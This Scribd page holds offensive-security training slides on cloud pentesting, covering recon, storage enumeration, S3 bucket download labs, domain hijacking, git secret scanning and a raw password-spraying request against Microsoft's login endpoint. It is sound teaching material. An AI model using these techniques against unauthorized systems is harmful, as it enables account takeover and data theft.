Scribd
Upload
269 views144 pages

Breaching The Cloud Perimeter Slides

The document discusses penetration testing cloud environments. It begins with an overview of authorization requirements when testing cloud services and common authentication methods used, such as access keys, certificates, and tokens. It then covers reconnaissance techniques, including discovering cloud assets through DNS records and IP space analysis, as well as tools for reconnaissance like Recon-NG, Amass, Spiderfoot and Gobuster. The document will continue discussing exploiting misconfigurations, gaining footholds, and post-compromise activities in cloud environments.

Uploaded by

refakyu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
269 views144 pages

Breaching The Cloud Perimeter Slides

The document discusses penetration testing cloud environments. It begins with an overview of authorization requirements when testing cloud services and common authentication methods used, such as access keys, certificates, and tokens. It then covers reconnaissance techniques, including discovering cloud assets through DNS records and IP space analysis, as well as tools for reconnaissance like Recon-NG, Amass, Spiderfoot and Gobuster. The document will continue discussing exploiting misconfigurations, gaining footholds, and post-compromise activities in cloud environments.

Uploaded by

refakyu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 144

Breaching the Cloud

Perimeter
Brought to you by…

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon
• Pillaging Cloud Assets
• Cloud Infrastructure Attacks
• Weaponizing the Cloud for Red Team Operations

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud vs. On-Prem
• What is different about penetration
testing "the cloud"?
• Traditional attacks, different angle
• Post-compromise results in new
challenges
• More room for misconfiguration
• Higher risk to orgs as services used
by employees are now public
facing

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Author/Instructor
• Beau Bullock (@dafthack)
• Pentester / Red Team at Black Hills
Information Security
• Certs: OSCP, OSWP, GXPN, GPEN,
GWAPT, GCIH, GCIA, GCFA, GSEC
• Speaker: WWHF, DerbyCon, Black Hat
Arsenal, BSides, Hack Miami, RVASec
• Tool Developer: MailSniper, PowerMeta,
DomainPasswordSpray, MSOLSpray,
HostRecon Check-LocalAdminHash

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Sources & Thanks!
• Huge thanks to all the cloud pentesting blog/book authors & open
source developers!
• Sean Metcalf (@PyroTek3) & Trimarc - https://adsecurity.org/
• Karl Fosaaen (@kfosaaen) & NETSPI - https://blog.netspi.com/
• Ryan Hausknecht (@haus3c) & SpectorOps - https://posts.specterops.io/
• Dirk-jan Mollema (@_dirkjan) - https://dirkjanm.io/
• Mike Felch (@ustayready) - https://github.com/ustayready
• Matt Burrough (@mattburrough) - https://nostarch.com/azure
• Rhino Security Labs (@RhinoSecurity) - https://rhinosecuritylabs.com/blog/
• Zachary Rice (@zricethezav) - https://github.com/zricethezav
• Adam Chester (@xpn) - https://blog.xpnsec.com/
• NCC Group (@NCCGroupInfoSec) - https://github.com/nccgroup
• Chris Moberly (@init_string) & Gitlab - https://gitlab.com/gitlab-com/gl-security
• Lee Kagan (@invokethreatguy) & Lares - https://www.lares.com/resources/blog/
• Oddvar Moe (@Oddvarmoe) & TrustedSec - https://www.trustedsec.com/blog/
• Steve Borosh (@424f424f) - https://medium.com/@rvrsh3ll
• Full list of blog/tool references at the end of the slides!
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS v. Azure v. GCP
• Different names for similar services

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure v. Microsoft 365
GCP v. G-Suite
• Google Cloud Platform != G-Suite
• Azure != Microsoft 365
• G-Suite and Microsoft 365 are productivity suites that
can be utilized as standalone services
• GCP and Azure are infrastructure and so much more
• They can live in harmony together though

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Pentest Authorization

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Pentest
Authorization
• What are you allowed to test?
• Most cloud providers allow for the testing of a company's cloud
assets without filling out a form anymore
• Check each cloud provider’s rules prior to each engagement
• Typically refrain from:
• DoS testing
• Intense fuzzing
• Phishing the cloud provider’s employees
• Testing other company’s assets
• Etc.
• Most providers want you to report any vulnerabilities in their
platforms
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Pentesting Azure
• https://www.microsoft.com/en-us/msrc/pentest-rules-of-
engagement

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Pentesting AWS
• https://aws.amazon.com/security/penetration-testing/

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Pentesting GCP
• https://support.google.com/cloud/answer/6262505?hl=en

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Authentication Methods

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Authentication
Methods
• More ways to authenticate to cloud
providers than just username and
password
• API's, certificates, and more
• Multi-Factor settings might differ for
things like service accounts or those
that authenticate with certs
• Sometimes keys get posted publicly
with code to repos
• Finding authentication points is a key
first step

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Authentication
Methods: Azure
• Forms of authentication to consider…
• Password Hash Synchronization
• Pass Through Authentication
• Active Directory Federation Services (ADFS)
• Certificate-based auth
• Conditional access policies
• Long-term access tokens
• Legacy authentication portals

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Password Hash
Synchronization
• Azure AD Connect
• On-prem service
synchronizes hashed
user credentials to
Azure
• User can
authenticate directly
to Azure services like
O365 with their
internal domain
credential

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Pass-Through
Authentication
• Credentials stored
only on-prem
• On-prem agent
validates
authentication
requests to Azure
AD
• Allows SSO to other
Azure apps without
creds stored in
cloud

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Active Directory
Federation Services
• Credentials stored
only on-prem
• Federated trust is
setup between Azure
and on-prem AD to
validate auth requests
to the cloud
• For password attacks
you would have to
auth to the on-prem
ADFS portal instead
of Azure endpoints

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Certificate-based
Authentication
• Client certs for
authentication to API
• Certificate management
in legacy Azure Service
Management (ASM)
makes it impossible to
know who created a
cert (persistence
potential)
• Service Principals can
be setup with certs to
auth

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Access Tokens
• Authentication to Azure
with oAuth tokens
• Desktop CLI tools that
can be used to auth
store access tokens on
disk
• These tokens can be
reused on other MS
endpoints
• We have a lab on this
later!

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Authentication
Methods: AWS
• Programmatic access - Access + Secret Key
• Management Console Access

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS: Programmatic
Access
• Secret Access Key and Access Key ID for authenticating via
scripts and CLI

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS: Management
Console
• Web Portal Access to AWS

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Cloud Authentication
Methods: Google
• Web Access
• API – OAuth 2.0 protocol
• Access tokens – short lived
access tokens for service
accounts
• JSON Key Files – Long-lived
key-pairs
• Credentials can be federated

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Cloud Asset Discovery
• User Enumeration
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Reconnaissance

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• First step should be to determine what services are in use
• More and more orgs are moving assets to the cloud one at a
time
• Many have limited deployment to cloud providers, but some
have fully embraced the cloud and are using it for AD,
production assets, security products, and more
• Determine things like AD connectivity, mail gateways, web apps,
file storage, etc.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Traditional host discovery still applies
• After host discovery resolve all names, then perform whois
lookups to determine where they are hosted
• Microsoft, Amazon, Google IP space usually indicates cloud
service usage
• More later on getting netblock information for each cloud service
• MX records can show cloud-hosted mail providers

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Recon Tools
• Recon-NG
• https://github.com/lanmaster53/recon-ng
• OWASP Amass
• https://github.com/OWASP/Amass
• Spiderfoot
• https://www.spiderfoot.net/
• Gobuster
• https://github.com/OJ/gobuster
• Sublist3r
• https://github.com/aboul3la/Sublist3r

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Use search engines
• Bing and Google are good
places to start
site:targetdomain.com -site:www.targetdomain.com

• Baidu
• DuckDuckGo

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Certificate Transparency
• Monitors and logs digital certs
• Creates a public, searchable log
• Can help discover additional
subdomains
• More importantly… you can
potentially find more Top Level
Domains (TLD’s)!
• Single cert can be scoped for
multiple domains
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Shodan.io and Censys.io
• Internet-wide portscans
• Certificate searches
• Shodan query examples:
• org:”Target Name”
• net:”CIDR Range”
• port:”443”

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• DNS Brute Forcing
• Performs lookups on a list of
potential subdomains
• Make sure to use quality lists
• SecLists:
• https://github.com/danielmiessler/Sec
Lists/tree/master/Discovery/DNS
• If you find commonalities between
subdomains try iterating names

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• MX Records can help us identify cloud services in use
• O365 = target-domain.mail.protection.outlook.com
• G-Suite = google.com | googlemail.com
• Proofpoint = pphosted.com

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Other Services
• HackerTarget
• https://hackertarget.com/
• ThreatCrowd
• https://www.threatcrowd.org/
• DNSDumpster
• https://dnsdumpster.com/
• ARIN Searches
• https://whois.arin.net/ui/
• Search bar accepts wild cards “*”
• Great for finding other netblocks
owned by the same organization

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Now resolve all the domains you obtained and compare to cloud
service netblock ranges
• Azure Netblocks
• Public: https://www.microsoft.com/en-us/download/details.aspx?id=56519
• US Gov: http://www.microsoft.com/en-us/download/details.aspx?id=57063
• Germany: http://www.microsoft.com/en-us/download/details.aspx?id=57064
• China: http://www.microsoft.com/en-us/download/details.aspx?id=57062
• AWS Netblocks
• https://ip-ranges.amazonaws.com/ip-ranges.json
• GCP Netblocks
• Google made it complicated so there’s a script on the next page to get the current IP netblocks.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
#!/bin/sh

set -- $(dig -t txt +short _cloud-netblocks.googleusercontent.com +trace)

included="" ip4=""
while [ $# -gt 0 ]; do
k="${1%%:*}" v="${1#*:}"
case "$k" in
include)
# only include once
if [ "${included% $v *}" = "${included}" ]; then
set -- "$@" $(dig -t txt +short "$v")
included=" $v $included"
fi
;;
ip4) ip4="$v $ip4" ;;
esac
shift
done

for i in $ip4; do
echo "$i"
done

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Here is a script to compare a list of IP
addresses to Azure, AWS, GCP
ranges, and more:
• https://github.com/oldrho/ip2provider
• Create a list of IP addresses you want
to check one per line
cat iplist.txt | python ip2provider.py

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• O365 Usage
• https://login.microsoftonline.com/getuserrealm.srf?login=username@a
cmecomputercompany.com&xml=1
• https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/test
@targetdomain.com?Protocol=Autodiscoverv1

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• G-Suite Usage
• Try authenticating with a valid company email address at Gmail

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• AWS Usage
• Some web applications may pull content
directly from S3 buckets
• Look to see where web resources are
being loaded from to determine if S3
buckets are being utilized
• Burp Suite
• Navigate application like you normally would
and then check for any requests to:
• https://[bucketname].s3.amazonaws.com
• https://s3-[region].amazonaws.com/[Org
Name]

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Cloud Asset
Discovery
• Box.com Usage
• Look for any login portals
• https://companyname.account.box.
com
• Can find cached Box account
data too

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: Employees
• Need to build a user list
• LinkedIn is your friend
• Useful for both password attacks and
phishing
• Determine username schema via
public file Metadata (PDF, DOCX,
XLSX, etc.)
• PowerMeta
• https://github.com/dafthack/PowerMeta
• FOCA
• https://github.com/ElevenPaths/FOCA

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Recon: User
Enumeration
• User enumeration on Azure can be performed at
https://login.Microsoft.com/common/oauth2/token
• This endpoint tells you if a user exists or not
• Detect invalid users while password spraying with:
• https://github.com/dafthack/MSOLSpray (Lab on this later!)
• For on-prem OWA/EWS you can enumerate users with timing
attacks (MailSniper)

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Open S3 Buckets
• Public Azure Storage
• Public Google Buckets
• Pacu
• LAB: S3 Bucket Pillaging
• S3 Code Injection & Hijacking
• Gaining a Foothold
• Post-Compromise Recon

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Exploiting Misconfigured
Cloud Assets

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
S3 Buckets
• Amazon Simple Storage Service (S3)
• Storage service that is “secure by
default”
• Configuration issues tend to un-
secure buckets by making them
publicly accessible
• Nslookup can help reveal region
• S3 URL Format:
• https://[bucketname].s3.amazonaws.com
• https://s3-[region].amazonaws.com/[Org Name]
# aws s3 ls s3://<bucketname>/ --region <region>

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
EBS Volumes
• Elastic Block Store (EBS)
• AWS virtual hard disks
• Can have similar issues to S3 being
publicly available
• Dufflebag from Bishop Fox
• https://github.com/bishopfox/dufflebag
• Difficult to target specific org but can
find widespread leaks

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Data in Public Azure
Blobs
• Microsoft Azure Storage is like Amazon S3
• Blob storage is for unstructured data
• Containers and blobs can be publicly accessible via access policies
• Predictable URL’s at core.windows.net
• storage-account-name.blob.core.windows.net
• storage-account-name.file.core.windows.net
• storage-account-name.table.core.windows.net
• storage-account-name.queue.core.windows.net

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Data in Public Azure
Blobs
• The “Blob” access policy means
anyone can anonymously read
blobs, but can’t list the blobs in
the container
• The “Container” access policy
allows for listing containers and
blobs

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Data in Public Azure
Blobs
• Microburst
• https://github.com/NetSPI/MicroBurst
• Invoke-EnumerateAzureBlobs
• Brute forces storage account names, containers, and files
• Uses permutations to discover storage accounts
PS > Invoke-EnumerateAzureBlobs –Base <base name>

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Pacu
• An AWS exploitation framework from Rhino Security Labs
• https://github.com/RhinoSecurityLabs/pacu
• Modules examples:
• S3 bucket discovery
• EC2 enumeration
• IAM privilege escalation
• Persistence modules
• Exploitation modules
• And more…

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Data in Public Google
Storage Buckets
• Google Cloud Platform also has a storage service called “Buckets”
• Cloud_enum from Chris Moberly (@initstring)
• https://github.com/initstring/cloud_enum
• Awesome tool for scanning all three cloud services for buckets and more
• Enumerates:
• GCP open and protected buckets as well as Google App Engine sites
• Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps
• AWS open and protected buckets

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB
S3 Bucket Pillaging

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: S3 Bucket Pillaging
• GOAL: Locate Amazon S3 buckets and search them for
interesting data
• In this lab you will attempt to identify a publicly accessible S3
bucket hosted by an organization. After identifying it you will list
out the contents of it and download the files hosted there.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: S3 Bucket Pillaging
• For these first 2 labs you will be using the Kali VM!
• In this lab you will be using cloud_enum to locate and search S3
buckets
• Run the below commands to install cloud_enum
~$ sudo apt-get install python3-pip
~$ git clone https://github.com/initstring/cloud_enum.git
~$ cd cloud_enum
~$ sudo pip3 install -r ./requirements.txt

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: S3 Bucket Pillaging
• Set up your AWS Access keys
~$ sudo aws configure
• Enter your “Access Key ID” and then “Secret Access Key”. These
were created during the “Prerequisite Setup”.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: S3 Bucket Pillaging
• Start cloud_enum
python3 cloud_enum.py -k glitchcloud
Cloud_enum will begin brute forcing
bucket names across all three services

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: S3 Bucket Pillaging
• Use the AWS cli to list out files in the S3 bucket
~$ sudo aws s3 ls s3://glitchcloud

• Download the files in the bucket


~$ sudo aws s3 sync s3://glitchcloud s3-files-dir

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
S3 Code Injection
• Backdoor JavaScript in S3
Buckets used by webapps
• In March, 2018 a crypto-
miner malware was found to
be loading on MSN’s
homepage
• This was due to AOL’s
advertising platform having a
writeable S3 bucket, which
was being served by MSN

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
S3 Code Injection
• If a webapp is loading content
from an S3 bucket made publicly
writeable attackers can upload
malicious JS to get executed by
visitors
• Can perform XSS-type attacks
against webapp visitors
• Hook browser with Beef

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Domain Hijacking
• Hijack S3 domain by finding
references in a webapp to S3
buckets that don’t exist anymore
• Or… subdomains that were linked to
an S3 bucket with CNAME’s that still
exist
• When assessing webapps look for
404’s to *.s3.amazonaws.com

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Domain Hijacking
• When brute forcing
subdomains for an org look for
404’s with ‘NoSuchBucket’ error
• Go create the S3 bucket with
the same name and region
• Load malicious content to the
new S3 bucket that will be
executed when visitors hit the
site

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Key Disclosure in Public Repositories
• LAB: Pillage Git Repos for Keys
• Password Attacks
• LAB: Password Spraying
• Web Server Exploitation
• AWS Instance Metadata URL
• Phishing
• Steal Access Tokens
• LAB: Authenticate to Azure with Stolen Access Tokens
• Post-Compromise Recon

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Gaining A Foothold

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Key Disclosure in Public
Repositories
• Very often keys can get
disclosed to public code
repositories such as
Github, Bitbucket, or
Gitlab
• Scavenge repos for keys
• Find secrets in real time:
shhgit.darkport.co.uk
• https://github.com/eth0izzle/shhgit

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Key Disclosure in Public
Repositories
• Some tools for searching Git
Repos
• Search through not only current
code but also commit history
• GitLeaks
• https://github.com/zricethezav/gitleaks
• Gitrob
• https://github.com/michenriksen/gitrob
• Truffle Hog
• https://github.com/dxa4481/truffleHog

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB
Pillage Git Repos for Keys

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Git Secrets
• GOAL: Identify a target code repository and then search through
all commit history to discover secrets that have been mistakenly
posted.
• Oftentimes, developers post access keys, or various other forms
of credentials to code repositories on accident. Even if they
remove the keys they may still be discoverable by searching
through previous commit history.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Git Secrets
• GitLeaks – Tool for searching Github or
Gitlab repos
• Can search single repos or search an
entire organization or user
• Written in Go, binary releases available
• We are going to use the Docker image

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Git Secrets
• Pull GitLeaks with Docker
~$ sudo docker pull zricethezav/gitleaks
• Print the help menu
~$ sudo docker run --rm --name=gitleaks
zricethezav/gitleaks --help

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Git Secrets
• Use GitLeaks to search for secrets
~# sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r
https://github.com/zricethezav/gitleaks.git

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Git Secrets
• Use a web browser to view the commit

• https://github.com/[git account]/[repo name]/commit/[commit ID]

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Password Attacks
• Password Spraying
• Trying one password for every user
at an org to avoid account lockouts
(Spring2020)
• Most systems have some sort of
lockout policy
• Example:
• 5 attempts in 30 mins = lockout
• If we attempt to auth as each
individual username one time
every 30 mins we lockout nobody

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Password Attacks
• Credential Stuffing
• Using previously breached credentials
to attempt to exploit password reuse
on corporate accounts
• People tend to reuse passwords for
multiple sites including corporate
accounts
• Various breaches end up publicly
posted
• Search these and try out creds
• Try iterating creds

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Password Attacks
• Password Spraying Microsoft Online (Azure/O365)
• Can spray https://login.microsoftonline.com
POST /common/oauth2/token HTTP/1.1
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Host: login.microsoftonline.com
Content-Length: 195
Expect: 100-continue
Connection: close

resource=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-
dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&passwor
d=Winter2020&scope=openid

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Password Attacks
• Use MSOLSpray to do this:
• https://github.com/dafthack/MSOLSpray
• The script logs:
• If a user cred is valid
• If MFA is enabled on the account
• If a tenant doesn't exist
• If a user doesn't exist
• If the account is locked
• If the account is disabled
• If the password is expired

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB
